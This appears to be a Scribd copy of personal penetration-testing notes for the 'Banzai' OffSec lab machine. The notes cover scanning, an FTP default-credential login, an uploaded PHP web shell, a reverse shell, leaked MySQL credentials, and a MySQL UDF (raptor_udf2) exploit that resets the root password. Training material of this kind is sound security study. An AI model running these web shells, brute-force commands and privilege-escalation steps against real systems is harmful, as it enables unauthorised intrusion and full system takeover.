Scribd
Upload
47 views14 pages

Banzai

The document details a series of Nmap scans performed on the IP address 192.168.241.56, revealing open ports and services including FTP, SSH, SMTP, PostgreSQL, and HTTP. Vulnerabilities were identified, particularly with Diffie-Hellman key exchanges and outdated software versions, alongside attempts to exploit these services through various methods including FTP file uploads and command execution via a web interface. Additionally, it includes findings from Nikto scans, PostgreSQL enumeration, and brute-force attempts, culminating in the discovery of database credentials for escalation purposes.

Uploaded by

Vo Tinh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
47 views14 pages

Banzai

The document details a series of Nmap scans performed on the IP address 192.168.241.56, revealing open ports and services including FTP, SSH, SMTP, PostgreSQL, and HTTP. Vulnerabilities were identified, particularly with Diffie-Hellman key exchanges and outdated software versions, alongside attempts to exploit these services through various methods including FTP file uploads and command execution via a web interface. Additionally, it includes findings from Nikto scans, PostgreSQL enumeration, and brute-force attempts, culminating in the discovery of database credentials for escalation purposes.

Uploaded by

Vo Tinh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 14

$ nmap -sV -sC -A -Pn 192.168.241.

56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-06 10:44 EST
Nmap scan report for 192.168.241.56
Host is up (0.12s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| 256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_ 256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN,
STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE:
cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.45 seconds

$ nmap -sC -sV -A -Pn -p- 192.168.241.56


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-06 10:45 EST
Nmap scan report for 192.168.241.56
Host is up (0.15s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| 256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_ 256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN,
STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE:
cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 561.71 seconds

$ nmap -Pn -p21,22,25,5432,8080,8295 --script vuln 192.168.242.56


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-18 11:30 EST
Nmap scan report for 192.168.242.56
Host is up (0.13s latency).

PORT STATE SERVICE


21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
25/tcp open smtp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 2048
| Generator Length: 8
| Public Key Length: 2048
| References:
|_ https://www.ietf.org/rfc/rfc2246.txt
|_sslv2-drown:
5432/tcp open postgresql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
8080/tcp open http-proxy
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8295/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 46.38 seconds

FTP: cannot login as anonymous

Lesson learned from AuthBy: try (admin/admin) and it works


// Can upload files, for example hello.txt

@ http://192.168.242.56:8080/hello.txt -> Not found

@ http://192.168.242.56:8295/hello.txt -> Get access to the uploaded file

@ http://192.168.241.56:8080/
@ http://192.168.241.56:8295/

● Designed by BootstrapMade https://bootstrapmade.com/

$ nikto -h 192.168.241.56 -p 8295


- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.241.56
+ Target Hostname: 192.168.241.56
+ Target Port: 8295
+ Start Time: 2020-11-06 10:58:53 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false
positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-11-06 11:22:17 (GMT-5) (1404 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

// Enumeration PostgreSQL DB 9.6.4 - 9.6.6

// SMTP enumeration
$ telnet 192.168.241.56 25
EHLO offseclabs.com
VRFY root // user root
VRFY banzai // user banzai
$ gobuster dir -u http://192.168.241.56:8295 -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 4 -q
/index.php (Status: 200)
/img (Status: 301)
/css (Status: 301)
/lib (Status: 301)
/js (Status: 301)
/contactform (Status: 301)
...

// Bruteforce SSH password of user banzai but failed


$ hydra -l banzai -P /home/kali/OSCP/wordlists/rockyou.txt 192.168.241.56 -t 4 ssh

// Create cmd.php as follows:


<?php system($_GET['cmd']);?>
// Upload it via FTP

// Access it from web browser and run command like “id”


@ http://192.168.242.56:8295/cmd.php?cmd=id

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash
admin:x:1001:1001::/var/www/html/:
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
postfix:x:110:115::/var/spool/postfix:/bin/false
postgres:x:111:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

// Upload php-reverse-shell.php (should choose open ports like 5432, in this case 443
did not work)

// Get the reverse shell when triggering @ http://192.168.103.56:8295/php-reverse-


shell.php

TODO: Try to upload cmd.php (like AuthBy for Windows)


● Execute reverse command from the browser but failed
● Generate reverse shell using msfvenom and run from the browser and failed
-> Maybe I chose the wrong port ???
Local.txt: 1cb20a49e87bd6496b2471f5f5abf091
What the fucK ???

// Port 80 is blocked, download linpeas.sh from local with port 80 failed. Port 5432 works

// linpeas’s log found nothing interesting, so we manually examine the folders


// Found database cred for PostgreSQL on port 5432 (root : EscalateRaftHubris123) in
/var/www/config.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>
// There is psql which is used to connect to PostgreSQL database

// psql options

// Try to connect (for www-data/admin/root and this password) but failed


$ psql -h 127.0.0.1 -p 5432 -d main -U root -W

// Also cannot access to user’s shell using this password


??? How to use this cred ???

This is not the cred for PostgreSQL, actually for MySQL (there are 2 types of databases) -
> FUCK

$ mysql -u root -p (EscalateRaftHubris123)


mysql> show databases;

mysql> use mysql;


mysql> show tables;
-> Found nothing, even in table user or in other databases ???
Privilege Escalation: Service accounts are there for a reason

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)


https://www.exploit-db.com/exploits/1518
Exploiting a vulnerable version of MySQL which is running as root to get root access
MySQL UDF Dynamic Library exploit lets you execute arbitrary commands from the mysql
shell. If mysql is running with root privileges, the commands will be executed as root.
Read more:
● https://highon.coffee/blog/lord-of-the-root-walkthrough/
● https://payatu.com/guide-linux-privilege-escalation
● Similar to Timeclock in OSCP Labs

// Download and compile the exploit “raptor_udf2.c”


www-data@banzai:/tmp$ gcc -g -c raptor_udf2.c
www-data@banzai:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o
raptor_udf2.so raptor_udf2.o -lc

// Need to copy the shared library raptor_udf2.so to the correct path of mysql. Here at
/usr/lib/mysql/plugin (for Timeclock: /usr/lib/raptor_udf2.so). If not, later when running the
following commands, we have this error: cannot open shared object file.

www-data@banzai:/tmp$ cp raptor_udf2.so /usr/lib/mysql/plugin/

// Run mysql
www-data@banzai:/tmp$ mysql -u root -p
Enter password: EscalateRaftHubris123

// Create a new table in the database mysql, and load the shared library
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

mysql> create function do_system returns integer soname 'raptor_udf2.so';


mysql> select * from mysql.func;

// Inject the command to modify the root’s password as “passwd”


mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown >
banzai.banzai /tmp/out');

// Get root shell using password “passwd”


www-data@banzai:/tmp$ su - (passwd)

Proof.txt: 7982105b92edc65dd8bd0e6837f1b399

You might also like